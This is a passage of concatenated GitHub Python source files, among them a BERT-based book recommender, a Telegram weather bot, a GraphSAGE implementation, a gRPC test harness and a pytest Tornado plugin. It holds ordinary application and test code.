keras.layers.Input(shape=(1,), dtype='int32', name='user_id_input')\n user_location = keras.layers.Input(shape=(3,), dtype='int32', name='user_location_input')\n\n book_title_blurb_id = keras.layers.Input(shape=(max_sequence_length,), dtype='int32', name='book_title_blurb_id')\n book_title_blurb_type_id = keras.layers.Input(shape=(max_sequence_length,), dtype='int32', name='book_title_blurb_type_id')\n book_title_blurb_mask = keras.layers.Input(shape=(max_sequence_length,), dtype='int32', name='book_title_blurb_mask')\n return user_id, user_location, book_title_blurb_id, book_title_blurb_type_id, book_title_blurb_mask\n\n# 嵌入矩阵的维度\nembed_dim = 8\nembed_dim_words = 16\n\ndef user_embed_layer(u_id, u_loca):\n user_id_embedd = keras.layers.Embedding(all_user, embed_dim, name='user_id_embedding')(u_id)\n user_loca_embedd = keras.layers.Embedding(all_location, embed_dim , name='user_loca_embedding')(u_loca)\n return user_id_embedd, user_loca_embedd\n\ndef get_user_feature(u_id_embedd, u_loca_embedd):\n u_id_layer = keras.layers.Dense(32, activation='relu', kernel_regularizer=tf.nn.l2_loss, name='u_id_dense')(u_id_embedd)\n# u_id_layer_drop = keras.layers.Dropout(rate=0.5, name='u_id_layer_drop')(u_id_layer)\n # u_id_layer.shape = (?, 1, 64)\n # u_loca_layer.shape = (?, 64)\n # 这里可以再加个Dense\n u_loca_layer = keras.layers.LSTM(16, go_backwards=True, name='u_loca_lstm')(u_loca_embedd)\n u_loca_layer_lstm = keras.layers.Dense(32, activation='relu', kernel_regularizer=tf.nn.l2_loss, name='u_loca_layer_lstm')(u_loca_layer)\n u_id_reshape = keras.layers.Reshape([32])(u_id_layer)\n u_combine = keras.layers.concatenate([u_id_reshape, u_loca_layer_lstm],axis=1, name='u_combine')\n print(u_combine.shape)\n # 这里能不能用激活函数\n u_feature_layer = keras.layers.Dense(100, activation='tanh', name='u_feature_layer')(u_combine)\n print(u_feature_layer.shape)\n return u_feature_layer\n\n\ndef get_book_feature(book_title_id, book_title_type_id, book_title_mask):\n config = BertConfig()\n # 获取隐藏层的信息\n config.output_hidden_states = True\n bert_model = TFBertModel.from_pretrained(bert_path + 'bert-base-uncased-tf_model.h5', config=config)\n book_title_cls = bert_model(book_title_id, attention_mask=book_title_mask, token_type_ids=book_title_type_id)\n print(len(book_title_cls))\n print(book_title_cls[0].shape)\n print(book_title_cls[1].shape)\n book_feature_layer = keras.layers.Dense(100, activation='tanh')(book_title_cls[1])\n return book_feature_layer\n\n\ndef get_rating(user_feature, book_feature):\n# multiply_layer = keras.layers.Lambda(lambda layer: tf.reduce_sum(layer[0]+layer[1], axis=1, keepdims=True), name = 'user_book_feature')((user_feature, book_feature))\n inference_layer = keras.layers.concatenate([user_feature, book_feature], axis=1, name='user_book_feature')\n inference_dense = tf.keras.layers.Dense(64, kernel_regularizer=tf.nn.l2_loss, activation='relu')(inference_layer)\n multiply_layer = tf.keras.layers.Dense(1, name=\"inference\")(inference_layer) # inference_dense\n return multiply_layer\n\ndef creat_model():\n user_id, user_location, book_title_blurb_id, book_title_blurb_type_id, book_title_blurb_mask = get_inputs()\n user_id_embedd, user_loca_embedd = user_embed_layer(user_id, user_location)\n u_feature_layer = get_user_feature(user_id_embedd, user_loca_embedd)\n book_feature_layer = get_book_feature(book_title_blurb_id, book_title_blurb_type_id, book_title_blurb_mask)\n multiply_layer = get_rating(u_feature_layer, book_feature_layer)\n model = keras.Model(inputs=[user_id, user_location, book_title_blurb_id, book_title_blurb_type_id, book_title_blurb_mask],\n outputs=[multiply_layer])\n return model\n\nmodel = creat_model()\nprint(model.summary())\n\ndef get_train_val_test():\n m = len(origin_DATA.features['Location'])\n m = math.ceil(m/10)\n # 对location取3位数\n loca = np.zeros((m, 3))\n for i in range(m):\n loca[i] = np.array(origin_DATA.features['Location'][i])\n\n print(loca[:-2])\n input_features = [origin_DATA.features['User-ID'].to_numpy(), loca,\n data_blurb_title.input_ids, data_blurb_title.input_masks, data_blurb_title.input_type_ids]\n labels = origin_DATA.labels.to_numpy()\n # 分割数据集以及shuffle\n np.random.seed(100)\n number_features = len(input_features)\n shuffle_index = np.random.permutation(m)\n shuffle_train_index = shuffle_index[:math.ceil(m*0.96)]\n shuffle_val_index = shuffle_index[math.ceil(m*0.96): math.ceil(m*0.98)]\n shuffle_test_index = shuffle_index[math.ceil(m*0.98):]\n train_features = [input_features[i][shuffle_train_index] for i in range(number_features)]\n train_labels = labels[shuffle_train_index]\n val_features = [input_features[i][shuffle_val_index] for i in range(number_features)]\n val_lables = labels[shuffle_val_index]\n test_features = [input_features[i][shuffle_test_index] for i in range(number_features)]\n test_lables = labels[shuffle_test_index]\n return train_features, train_labels, val_features, val_lables, test_features, test_lables\n\ntrain_features, train_labels, val_features, val_lables, test_features, test_lables = get_train_val_test()\nprint(train_features[0].shape)\nprint(val_features[0].shape)\nprint(test_features[0].shape)\n\nclass model_network():\n def __init__(self):\n self.batchsize = 2\n self.epoch = 3\n def creat_model(self):\n user_id, user_location, book_title_blurb_id, book_title_blurb_type_id, book_title_blurb_mask = get_inputs()\n user_id_embedd, user_loca_embedd = user_embed_layer(user_id, user_location)\n u_feature_layer = get_user_feature(user_id_embedd, user_loca_embedd)\n b_feature_layer = get_book_feature(book_title_blurb_id, book_title_blurb_type_id, book_title_blurb_mask)\n multiply_layer = get_rating(u_feature_layer, b_feature_layer)\n model = keras.Model(inputs=[user_id, user_location, book_title_blurb_id, book_title_blurb_type_id, book_title_blurb_mask] ,\n outputs=[multiply_layer])\n return model\n def train_model(self):\n model_optimizer = keras.optimizers.Adam()\n model = self.creat_model()\n model.compile(optimizer=model_optimizer, loss=keras.losses.mse)\n history = model.fit(train_features, train_labels, validation_data=(val_features, val_lables), epochs=self.epoch, batch_size=self.batchsize, verbose=1)\n return model, history\n def predict_model(self, model):\n test_loss = model.evaluate(test_features, test_lables, batch_size=self.batchsize, verbose=1)\n return test_loss\n\nnet_work = model_network()\nmodel, history = net_work.train_model()","repo_name":"StrayCamel247/Recommend_system","sub_path":"model_3_bert.py","file_name":"model_3_bert.py","file_ext":"py","file_size_in_byte":16852,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"83"} +{"seq_id":"6118487899","text":"from aiogram import Bot, Dispatcher, types, executor\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\nfrom apscheduler.schedulers.asyncio import AsyncIOScheduler\nfrom middlewares import SchedulerMiddleware\nfrom tasks import set_scheduled_jobs\n\nfrom configs import i18n, TOKEN\nfrom db import collusers, insert_new_user, get_current_user_col, update_notify_hours_by_user_id, \\\n update_city_hours_by_user_id, user_counts\nfrom utils import get_current_user_weather_data, get_text, SCHEDULED_HOURS, cities, get_key_from_dict_value\n\nbot = Bot(token=TOKEN)\ndp = Dispatcher(bot, storage=MemoryStorage())\n\n# Setup i18n middleware\ndp.middleware.setup(i18n)\n_ = i18n.lazy_gettext\n\n# Setup schedulers\nscheduler = AsyncIOScheduler()\ndp.middleware.setup(SchedulerMiddleware(scheduler))\n\nmain_menu_kbs = types.ReplyKeyboardMarkup(\n [\n [\n types.KeyboardButton(_(\"📅 Bugungi ob-havo\"))\n ],\n [\n types.KeyboardButton(_(\"⚙️ Sozlamalar\"))\n ]\n ],\n resize_keyboard=True\n)\n\nsettings_kbs = types.ReplyKeyboardMarkup(\n [\n [\n types.KeyboardButton(_(\"📍 Shaharni o'zgartirish\"))\n ],\n [\n types.KeyboardButton(_(\"⏰ Obuna o'zgartirish\"))\n ],\n [\n types.KeyboardButton(_(\"⬅️ Ortga qaytish\"))\n ]\n ],\n resize_keyboard=True\n)\n\nschedule_kbs_list = types.ReplyKeyboardMarkup(\n [\n [types.KeyboardButton(f'{i}:00') for i in SCHEDULED_HOURS[:3]],\n [types.KeyboardButton(f'{i}:00') for i in SCHEDULED_HOURS[3:6]],\n [types.KeyboardButton(f'{i}:00') for i in SCHEDULED_HOURS[6:9]],\n [types.KeyboardButton(f'{i}:00') for i in SCHEDULED_HOURS[9:12]],\n [types.KeyboardButton(f'{i}:00') for i in SCHEDULED_HOURS[12:15]],\n [types.KeyboardButton(f'{i}:00') for i in SCHEDULED_HOURS[15:18]],\n [types.KeyboardButton(f'{i}:00') for i in SCHEDULED_HOURS[18:21]],\n [types.KeyboardButton(f'{i}:00') for i in SCHEDULED_HOURS[21:24]],\n [types.KeyboardButton(_(\"⬅️ Ortga qaytish\"))]\n ]\n)\n\ncity_adding_emoji = \"🌆 \"\n\ncity_list_kb = types.ReplyKeyboardMarkup(\n [\n [types.KeyboardButton(city_adding_emoji + cities[i]['name'])] for i in cities.keys()\n ]\n)\n\n\n@dp.message_handler(commands='start')\nasync def start(message: types.Message):\n count = await collusers.count_documents({'_id': message.from_user.id})\n if count == 0:\n await insert_new_user(message.from_user.id)\n await message.answer(_(\"Bot ishlab turipti\"),\n reply_markup=main_menu_kbs)\n\n\n@dp.message_handler(lambda msg: msg.text == _(\"📅 Bugungi ob-havo\"))\nasync def language_echo(msg: types.Message):\n user_data = await get_current_user_col(msg.from_user.id)\n if user_data is not None:\n weather_data = await get_current_user_weather_data(user_data)\n w_hourly = weather_data[\"w_hourly_data\"]\n w_day = weather_data[\"w_day\"]\n data_to_send = get_text(w_day, w_hourly, user_data)\n await msg.answer(data_to_send)\n else:\n await insert_new_user(msg.from_user.id)\n await language_echo(msg)\n\n\n@dp.message_handler(lambda msg: msg.text == _(\"⚙️ Sozlamalar\"))\nasync def settings_echo(msg: types.Message):\n user_data = await get_current_user_col(msg.from_user.id)\n if user_data is not None:\n text_dict = user_data\n text_dict.update({\"city_name\": cities.get(text_dict['city'])['name']})\n await msg.answer(\n _(\"Hozirgi sozlamalaringiz\\n\"\n \"Shahar: {city_name}\\n\"\n \"Obuna: Har kuni {notify_hours}:00 da\").format(**text_dict),\n reply_markup=settings_kbs\n )\n else:\n await insert_new_user(msg.from_user.id)\n await settings_echo(msg)\n\n\n@dp.message_handler(lambda msg: msg.text == _(\"⏰ Obuna o'zgartirish\"))\nasync def notification_echo(msg: types.Message):\n await msg.answer(_(\"Qachon ob-havo ma'lumotini olishni istaysiz?\"), reply_markup=schedule_kbs_list)\n\n\n@dp.message_handler(lambda msg: msg.text == _(\"⬅️ Ortga qaytish\"))\nasync def back_button(msg: types.Message):\n await start(msg)\n\n\n@dp.message_handler(lambda msg: msg.text.find(city_adding_emoji) == 0)\nasync def city_setting_button(msg: types.Message):\n city_name = msg.text.split(city_adding_emoji)[1]\n city_key = get_key_from_dict_value(city_name)\n await update_city_hours_by_user_id(msg.from_user.id, city_key)\n await msg.answer(_(\"{city_name} shahri tanlandi\").format(city_name=city_name), reply_markup=main_menu_kbs)\n\n\n@dp.message_handler(lambda msg: msg.text == \"/users_count\")\nasync def get_users_count(msg: types.Message):\n await msg.answer(\"Users count: {}\".format(await user_counts()))\n\n\n@dp.message_handler(lambda msg: msg.text == _(\"📍 Shaharni o'zgartirish\"))\nasync def city_change_button(msg: types.Message):\n await msg.answer(_(\"Iltimos, shahringizni tanlang.\"), reply_markup=city_list_kb)\n\n\n@dp.message_handler(regexp=\"^([0-1]?[0-9]|2[0-3]):[0-5][0-9]$\")\nasync def hours_setting_button(msg: types.Message):\n hour = int(msg.text.split(\":\")[0])\n await update_notify_hours_by_user_id(msg.from_user.id, hour)\n await msg.answer(_(\"Endi men sizga har kuni soat {hour}:00 da ob-havo ma'lumotini jo'nataman.\").format(hour=hour),\n reply_markup=main_menu_kbs)\n\n\n@dp.message_handler()\nasync def echo(msg: types.Message):\n await msg.answer(msg.text)\n\n\nasync def on_startup(dp):\n scheduler.start()\n set_scheduled_jobs(scheduler, bot)\n print(await dp.bot.get_me())\n\n\nif __name__ == \"__main__\":\n print(\"Bot ishga tushirilmoqda...\")\n executor.start_polling(dp, on_startup=on_startup)\n","repo_name":"STQT/pogodasuzbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"5097353227","text":"class Solution:\n def minCost(self, colors: str, neededTime: List[int]) -> int:\n cur_col = \"\"\n costs = []\n time = 0\n \n for i, color in enumerate(colors):\n if color == cur_col:\n costs.append(neededTime[i])\n else:\n if len(costs) > 1:\n time += sum(costs) - max(costs) # write a helper to not need to go through costs twice\n cur_col = color\n costs = [neededTime[i]]\n if len(costs) > 1:\n time += sum(costs) - max(costs) # write a helper to not need to go through costs twice\n \n return time","repo_name":"zathrath03/leetcode","sub_path":"1578-minimum-time-to-make-rope-colorful/1578-minimum-time-to-make-rope-colorful.py","file_name":"1578-minimum-time-to-make-rope-colorful.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"48828580844","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch_geometric.utils import to_dense_adj\nimport threading\n\n\nclass GraphSAGEConvolution(nn.Module):\n def __init__(self, in_features, out_features, aggregator='mean'):\n super(GraphSAGEConvolution, self).__init__()\n assert aggregator in ['mean', 'pool'], \"Aggregator must be one of ['mean', 'pool']\"\n\n self.aggregator = aggregator\n if aggregator == 'mean':\n self.linear = nn.Linear(in_features, out_features)\n\n if self.aggregator == 'pool':\n self.linear = nn.Linear(in_features * 2, out_features)\n self.pool_linear = nn.Linear(in_features, in_features)\n\n self.adj = None\n self.neighbors = None\n\n def forward(self, x, edge_index):\n if self.adj is None and self.neighbors is None:\n if self.aggregator == 'mean':\n self._make_adj(edge_index)\n if self.aggregator == 'pool':\n self._make_neighbors(edge_index)\n # Aggregate neighbors\n if self.aggregator == 'mean':\n x_neighbors = torch.matmul(self.adj_normalized, x)\n x_concat = x_neighbors\n\n elif self.aggregator == 'pool':\n pool_x = F.relu(self.pool_linear(x))\n\n # # Define a worker function for computing the maximum values for each node\n # def worker(node_idx):\n # rows = self.neighbors[node_idx]\n # max_vals, _ = torch.max(pool_x[rows], dim=0)\n # x_neighbors[node_idx] = max_vals\n #\n # # Initialize a tensor to store the maximum values\n # x_neighbors = torch.zeros(x.shape).to(edge_index.device)\n #\n # # Create a list of threads\n # threads = [threading.Thread(target=worker, args=(i,)) for i in range(self.adj.shape[0])]\n #\n # # Start the threads\n # for thread in threads:\n # thread.start()\n #\n # # Wait for the threads to finish\n # for thread in threads:\n # thread.join()\n\n x_neighbors = torch.zeros(x.shape).to(edge_index.device)\n for i in range(self.adj.shape[0]):\n rows = self.neighbors[i]\n max_vals, _ = torch.max(pool_x[rows], dim=0)\n x_neighbors[i] = max_vals\n\n # Concatenate the node features and the aggregated neighbor features\n x_concat = torch.cat([x, x_neighbors], dim=1)\n\n # Apply the linear transformation\n out = self.linear(x_concat)\n\n return out\n\n def _make_adj(self, edge_index):\n if self.aggregator == 'mean':\n adj = to_dense_adj(edge_index).squeeze(0)\n D = torch.diag(torch.sum(adj, dim=0) ** (-0.5))\n self.adj_normalized = torch.matmul(torch.matmul(D, adj), D)\n\n def _make_neighbors(self, edge_index):\n self.neighbors = {}\n for i in range(self.adj.shape[0]):\n self.neighbors[i] = edge_index[1][edge_index[0] == i]\n\n\nclass GraphSAGE(nn.Module):\n def __init__(self, input_dim, hidden_dim, output_dim, num_layers, aggregator='mean'):\n super(GraphSAGE, self).__init__()\n self.layers = nn.ModuleList()\n self.layers.append(GraphSAGEConvolution(input_dim, hidden_dim, aggregator))\n\n for _ in range(num_layers - 2):\n self.layers.append(GraphSAGEConvolution(hidden_dim, hidden_dim, aggregator))\n\n self.layers.append(GraphSAGEConvolution(hidden_dim, output_dim, aggregator))\n\n def forward(self, x, adj):\n for i, layer in enumerate(self.layers):\n x = layer(x, adj)\n # Apply activation and dropout for all layers except the last one\n if i < len(self.layers) - 1:\n x = F.relu(x)\n x = F.dropout(x, p=0.5, training=self.training)\n return x\n","repo_name":"dipplestix/gnn_coloring","sub_path":"algorithms/graphsage.py","file_name":"graphsage.py","file_ext":"py","file_size_in_byte":3903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12900297931","text":"from hscommon.testutil import eq_\n\nfrom ..base import TestApp, with_app\nfrom ...gui.print_view import PrintView\n\nclass TestDateRangeOnApril2009:\n def do_setup(self, monkeypatch):\n monkeypatch.patch_today(2009, 4, 1)\n app = TestApp()\n app.drsel.select_month_range()\n app.show_tview()\n app.pv = PrintView(app.tview)\n return app\n \n @with_app(do_setup)\n def test_attributes(self, app):\n # We don't bother testing other views, but they're expected to have PRINT_TITLE_FORMAT\n eq_(app.pv.title, 'Transactions from 01/04/2009 to 30/04/2009')\n \n","repo_name":"Mouchnino/moneyguru","sub_path":"core/tests/gui/print_view_test.py","file_name":"print_view_test.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"70310909392","text":"import json\nimport requests \nimport time\n\ndef lambda_handler(event, context):\n # Disable SSL Verify = false Warnings\n requests.packages.urllib3.disable_warnings()\n urls = event\n lambdaReturn = {\n \"responses\": []\n }\n for url in urls:\n start = time.time()\n r = requests.get(url, verify=False)\n end = time.time()\n response = {\n \"statusCode\":str(r.status_code),\n \"requestTime\":str(end-start)[0:5],\n \"url\":url\n }\n lambdaReturn[\"responses\"].append(response)\n return {\n 'statusCode': 200,\n 'body': lambdaReturn\n }\n\n","repo_name":"fheutz/100dayChallenge-Python","sub_path":"code/003_lambda_http/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"6601638717","text":"# -*- coding: UTF-8 -*-\n\nimport json\nimport logging\nimport re\nimport sys\n\nfrom grpc._channel import _Rendezvous\n\nfrom common.module import env_module\nfrom common.module import excel_module\nfrom model.data_pool import DataPool\n\nsys.path.append(\"..\")\nsys.path.append(\"../../\")\nimport grpc\n\n# from deepdiff import DeepDiff\n# from pprint import pprint\n\nclass GetExcelCaseData:\n \"\"\"\n 初始化获取excelData\n 1、获取对应id的行的内容\n 2、获取url\n 3、获取请求方式\n 4、获取请求参数,并进行转码\n 5、获取预期结果\n 6、将预期结果转换为字典\n 7、设置headers\n 8、获取response\n 9、获取字典格式的response\n :param file_name: 测试数据的文件名\n :param sheet_index: sheet表的索引\n :param id: caseId\n :return:\n \"\"\"\n\n def __init__(self):\n self.protoFileName = ''\n self.serviceName = ''\n self.methodName = ''\n self.requestClass = ''\n self.exp_resp = '{}'\n self.data_res = '{}'\n\n def get_case_data(self, file_name, sheet_index=0, row_id=0, module_proto='order', module_host='order', dataPool=DataPool, data=None,\n **kwargs):\n\n \"\"\"\n 1、获取对应id的行的内容\n 5、获取预期结果\n 8、获取response\n :param file_name: 测试数据的文件名\n :param sheet_index: sheet表的索引\n :param id: caseId\n :return:exp_resp_dic,act_resp_dic\n \"\"\"\n excel_handle = excel_module.Read_Excel(file_name)\n sheet = excel_handle.get_sheet_by_index(sheet_index)\n case_data_list = excel_handle.get_row_values(sheet, row_id)\n\n\n self.protoFileName = case_data_list[1]\n self.serviceName = case_data_list[2]\n self.methodName = case_data_list[3]\n self.requestClass = case_data_list[4]\n\n if case_data_list[5] is not None:\n self.data_res = case_data_list[5]\n if case_data_list[6] is not None:\n self.exp_resp = case_data_list[6]\n\n matches = re.findall('\\$\\{(.*?)\\}', self.data_res)\n mset = set(matches)\n for item in mset:\n itemVal = str(dataPool.get(item)).encode('UTF-8')\n self.data_res = self.data_res.replace(\"${%s}\" % item, itemVal)\n if itemVal == '':\n print ('变量{}没有设置值'.format(item))\n\n\n self.data = json.loads(self.data_res, encoding=\"utf-8\")\n logging.info(self.data_res)\n if kwargs is not None:\n for i in kwargs:\n for j in self.data:\n if i == j:\n self.data[j] = kwargs[i]\n if data is not None:\n self.data = data\n\n self.data = self.__rewriteData(self.data)\n\n exp_resp = self.get_case_data_exp()\n act_resp = self.get_case_data_act(module_proto, module_host)\n\n\n # print (\"exp_resp\\n\", json.dumps(exp_resp))\n # print(\"act_resp\\n\", act_resp)\n return exp_resp, act_resp\n\n def __rewriteData(self, data):\n\n if isinstance(data, int) or isinstance(data, float) or isinstance(data, long):\n return data\n\n if isinstance(data, unicode):\n return data.encode('utf-8')\n\n if ( isinstance(data, list)):\n _list = []\n for item in data:\n _list.append(self.__rewriteData(item))\n\n return _list\n\n if (isinstance(data, tuple)):\n _tuple = []\n for item in data:\n _tuple.append(self.__rewriteData(item))\n\n return tuple(_tuple)\n\n\n if (isinstance(data, dict)):\n _data = {}\n for key in data:\n if isinstance(key, unicode):\n _key = key.encode('utf-8')\n else:\n _key = key\n\n _data[_key] = self.__rewriteData(data[key])\n\n return _data\n\n return data\n\n\n\n\n\n\n\n def get_case_input(self, file_name, sheet_index=0, row_id=0):\n \"\"\"\n 真实数据获取\n 1、获取实际结果\n 2、获取真实结果\n :return:exp_resp_dic,act_resp_dic\n \"\"\"\n excel_handle = excel_module.Read_Excel(file_name)\n sheet = excel_handle.get_sheet_by_index(sheet_index)\n case_data_list = excel_handle.get_row_values(sheet, row_id)\n self.data = case_data_list[6]\n return self.data\n\n\n\n def get_case_data_exp(self):\n \"\"\"\n 预期结果获取\n 1、直接获取预期结果\n 2、将预期结果转换为字典\n :return:预期结果\n \"\"\"\n logging.debug(\"-----------------1.expect-------------------------\" + self.exp_resp)\n # return self.exp_resp.encode(\"utf-8\")\n return json.loads(self.exp_resp)\n\n def get_case_data_act(self, module_proto, module_host='order'):\n \"\"\"s\n 真实数据获取\n 1、设置headers\n 2、获取response\n 3、获取字典格式的response\n :param module_host:\n :return:实际结果\n \"\"\"\n target = env_module.Env_Module().get_grpc_target(module_host);\n print ('target:', target)\n print (self.serviceName + \".\" + self.methodName)\n print ('input:', json.dumps(self.data))\n channel = grpc.insecure_channel(target)\n\n pb2 = \"test_case.pb2.\" + module_proto + \".\" + self.protoFileName + \"_pb2\"\n pb2_grpc = \"test_case.pb2.\" + module_proto + \".\" + self.protoFileName + \"_pb2_grpc\"\n stubName = self.serviceName + \"Stub\"\n methodName = self.methodName\n requestClass = self.requestClass\n\n # import test_case.protos.pb2.saasOrderService_pb2\n # import test_case.protos.pb2.saasOrderService_pb2_grpc.SaasOrderServiceStub\n # import test_case.pb2.pos.posmsgservice_pb2\n # import test_case.pb2.pos.posmsgservice_pb2\n # import test_case.pb2.pos.posmsgservice_pb2_grpc;\n pb2_mod = __import__(pb2, fromlist=True)\n pb2_grpc_mod = __import__(pb2_grpc, fromlist=True)\n\n stub = getattr(pb2_grpc_mod, stubName)(channel)\n\n request = getattr(pb2_mod, requestClass)(**self.data)\n response = None\n try:\n if(hasattr(stub, methodName)):\n response = getattr(stub, methodName)(request)\n except (\n _Rendezvous\n ) as e:\n print (e)\n print ('grpc exception!!!')\n\n error_code = e._state.code.name\n error_msg = e._state.details\n\n if error_code == 'UNAVAILABLE':\n # 当服务状态是不可用的时候,将当前云端的状态置为不可用\n print ('grpc error: UNAVAILABLE')\n raise e\n elif error_code == 'UNAUTHENTICATED':\n # 如果状态是验证未通过,将当前的HPosInfo置为过期\n print ('grpc error: UNAUTHENTICATED')\n raise e\n elif error_code == 'DEADLINE_EXCEEDED':\n # 不间断的五次deadLine,认为链路不可用\n print ('grpc error: DEADLINE_EXCEEDED')\n raise e\n else:\n print ('grpc error: other errors')\n raise e\n\n\n # if (hasattr(stub, methodName)):\n # response = getattr(stub, methodName)(request)\n return response\n\n def firstCharToLower(self, str):\n return str[0].lower() + str[1:]\n\n def get_case_data1(self, *case_data_list):\n\n \"\"\"\n 1、获取对应id的行的内容\n 5、获取预期结果\n 8、获取response\n :param file_name: 测试数据的文件名\n :param sheet_index: sheet表的索引\n :param id: caseId\n :return:exp_resp_dic,act_resp_dic\n \"\"\"\n\n self.protoFileName = case_data_list[1]\n self.serviceName = case_data_list[2]\n self.methodName = case_data_list[3]\n self.requestClass = case_data_list[4]\n module_proto = case_data_list[0]\n module_host = case_data_list[0]\n\n if case_data_list[5] is not None:\n self.data = case_data_list[5]\n self.data = self.__rewriteData(self.data)\n logging.info(self.data_res)\n act_resp = self.get_case_data_act(module_proto, module_host)\n\n return act_resp\n","repo_name":"jiaheqi/python-api-test","sub_path":"common/service/excel_case_facade_rpc.py","file_name":"excel_case_facade_rpc.py","file_ext":"py","file_size_in_byte":8301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"13254455423","text":"from contextlib import closing, contextmanager\nimport inspect\nfrom inspect import iscoroutinefunction\n\nimport tornado.ioloop\nimport tornado.testing\nimport tornado.simple_httpclient\n\nimport pytest\n\n\ndef get_test_timeout(pyfuncitem):\n timeout = pyfuncitem.config.option.async_test_timeout\n marker = pyfuncitem.get_closest_marker(\"timeout\")\n if marker:\n timeout = marker.kwargs.get(\"seconds\", timeout)\n return timeout\n\n\ndef pytest_addoption(parser):\n parser.addoption(\n \"--async-test-timeout\",\n type=float,\n help=(\"timeout in seconds before failing the test \" \"(default is no timeout)\"),\n )\n parser.addoption(\n \"--app-fixture\",\n default=\"app\",\n help=(\"fixture name returning a tornado application \" '(default is \"app\")'),\n )\n\n\n@pytest.mark.tryfirst\ndef pytest_pycollect_makeitem(collector, name, obj):\n if collector.funcnamefilter(name) and iscoroutinefunction(obj):\n return list(collector._genfunctions(name, obj))\n\n\n@pytest.mark.tryfirst\ndef pytest_pyfunc_call(pyfuncitem):\n funcargs = pyfuncitem.funcargs\n testargs = {arg: funcargs[arg] for arg in pyfuncitem._fixtureinfo.argnames}\n\n if not iscoroutinefunction(pyfuncitem.obj):\n pyfuncitem.obj(**testargs)\n return True\n\n try:\n loop = funcargs[\"io_loop\"]\n except KeyError:\n loop = tornado.ioloop.IOLoop.current()\n\n loop.run_sync(\n lambda: pyfuncitem.obj(**testargs), timeout=get_test_timeout(pyfuncitem)\n )\n return True\n\n\n@pytest.fixture\ndef io_loop():\n \"\"\"\n Create new io loop for each test, and tear it down after.\n \"\"\"\n loop = tornado.ioloop.IOLoop()\n loop.make_current()\n yield loop\n loop.clear_current()\n loop.close(all_fds=True)\n\n\n@pytest.fixture\ndef http_server_port():\n \"\"\"\n Port used by `http_server`.\n \"\"\"\n return tornado.testing.bind_unused_port()\n\n\n@pytest.yield_fixture\ndef http_server(request, io_loop, http_server_port):\n \"\"\"Start a tornado HTTP server that listens on all available interfaces.\n\n You must create an `app` fixture, which returns\n the `tornado.web.Application` to be tested.\n\n Raises:\n FixtureLookupError: tornado application fixture not found\n \"\"\"\n http_app = request.getfixturevalue(request.config.option.app_fixture)\n server = tornado.httpserver.HTTPServer(http_app)\n server.add_socket(http_server_port[0])\n\n yield server\n\n server.stop()\n\n if hasattr(server, \"close_all_connections\"):\n io_loop.run_sync(\n server.close_all_connections,\n timeout=request.config.option.async_test_timeout,\n )\n\n\nclass AsyncHTTPServerClient(tornado.simple_httpclient.SimpleAsyncHTTPClient):\n def initialize(self, *, http_server=None):\n super().initialize()\n self._http_server = http_server\n\n def fetch(self, path, **kwargs):\n \"\"\"\n Fetch `path` from test server, passing `kwargs` to the `fetch`\n of the underlying `tornado.simple_httpclient.SimpleAsyncHTTPClient`.\n \"\"\"\n return super().fetch(self.get_url(path), **kwargs)\n\n def get_protocol(self):\n return \"http\"\n\n def get_http_port(self):\n for sock in self._http_server._sockets.values():\n return sock.getsockname()[1]\n\n def get_url(self, path):\n return \"%s://127.0.0.1:%s%s\" % (self.get_protocol(), self.get_http_port(), path)\n\n\n@pytest.fixture\ndef http_server_client(http_server):\n \"\"\"\n Create an asynchronous HTTP client that can fetch from `http_server`.\n \"\"\"\n with closing(AsyncHTTPServerClient(http_server=http_server)) as client:\n yield client\n\n\n@pytest.fixture\ndef http_client(http_server):\n \"\"\"\n Create an asynchronous HTTP client that can fetch from anywhere.\n \"\"\"\n with closing(tornado.httpclient.AsyncHTTPClient()) as client:\n yield client\n","repo_name":"eukaryote/pytest-tornasync","sub_path":"src/pytest_tornasync/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"83"} +{"seq_id":"39425177509","text":"def menu():\n print('Hello! Welcome to my program about working on list in Python\\nWhat you wanna do?')\n print('1- Show the list items')\n print('2- Add an element (to the end) of the list')\n print('3- Insert an element at a position in the list')\n print('4- Delete the last element of the list')\n print('5- Reverse the list')\n print('6- Clear the list')\n print('7- Quit')\n\nmyList = []\ndef insertElement(theList : list, theIndex : int, theElement):\n theList.insert(theIndex,theElement)\n\nwhile True:\n menu()\n choice = int(input('Enter your choice over there : '))\n if choice == 1:\n if not myList:\n print('Empty List.\\n')\n input('touch any key to return to the menu')\n else:\n for element in myList:\n print(f'*{element}\\n')\n input('touch any key to return to the menu')\n\n elif choice == 2:\n if not myList:\n newElement = input('Enter the first element to add : ')\n myList.append(newElement)\n print('Well Done\\n')\n input('touch any key to return to the menu')\n else:\n newElement = input('Enter the element to add : ')\n myList.append(newElement)\n print('Well Done\\n')\n input('touch any key to return to the menu')\n\n elif choice == 3:\n if not myList:\n print('This list is empty. We gonna push your element to the first position')\n newElement = input('Enter the first element to add : ')\n myList.append(newElement)\n print('Well Done\\n')\n input('touch any key to return to the menu')\n else:\n newElement = input('Enter the element to add : ')\n indexOfElement = int(input('At which position you want to push it : '))\n insertElement(myList,indexOfElement,newElement)\n print('Well done')\n input('touch any key to return to the menu')\n \n elif choice == 4:\n if myList:\n print(f'You want to delete. Are you really sure?')\n while True:\n agreement = input('y for yes and n for no : ')\n if agreement== 'y' or agreement =='yes':\n myList.pop()\n print('Successfully removed')\n break\n elif agreement == 'n' or agreement == 'no':\n print('The element will not be 